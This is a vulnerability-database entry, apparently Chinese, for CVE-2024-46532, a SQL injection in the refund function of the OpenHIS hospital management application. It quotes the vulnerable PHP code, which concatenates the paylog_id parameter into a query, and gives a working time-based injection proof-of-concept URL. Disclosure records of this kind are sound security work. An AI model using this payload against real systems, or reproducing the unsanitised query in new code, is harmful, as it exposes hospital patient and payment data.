关联漏洞
标题:
OpenHIS 安全漏洞
(CVE-2024-46532)
描述:OpenHIS是中国新致(OpenHIS)公司的一个基于 web 的医院管理应用程序。 OpenHIS v.1.0版本存在安全漏洞,该漏洞源于PayController.class.php组件中的退款功能包含一个SQL注入漏洞。
描述
Reproduction of SQL Injection Vulnerabilities in OpenHIS
介绍
# CVE-2024-46532
Reproduction of SQL Injection Vulnerabilities in OpenHIS
Vulnerabilities:OpenHIS-master/Application/His/Controller/PayController.class.php
SourceLink:https://github.com/1638824607/OpenHIS?tab=readme-ov-file
Vulnerability code:
public function refund()
{
$paylog_id = I('get.paylog_id',0);
$amount = I('post.amount','all');//all就是是全部
$adm_uid = I('post.adm_uid',0);//all就是是全部
$adm_memo = I('post.adm_memo','退款');//all就是是全部
if(!$paylog_id||!$amount)$this->resJSON(1,'参数缺失:paylog_id or amount');
#todo 这里需要添加功能权限,无权限不能使用
$sql = "SELECT a.*,b.hospital_id,b.type_id,b.order_code,b.ol_pay_part,b.amount,b.patient_id FROM ".$this->tab_pre."his_care_paylog a LEFT JOIN ".$this->tab_pre."his_care_pkg b ON a.pkg_id=b.id WHERE a.id='$paylog_id' LIMIT 1";
$r = $this->db->query($sql);
if(!$r)$this->resJSON(2,'paylog_id无效',$sql);
POC:
/index.php/pay/refund?paylog_id=aaaa'+or+sleep(.6)+--+
文件快照
[4.0K] /data/pocs/575bbfabe718781d61df46e0c9f3f423151f5ee3
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。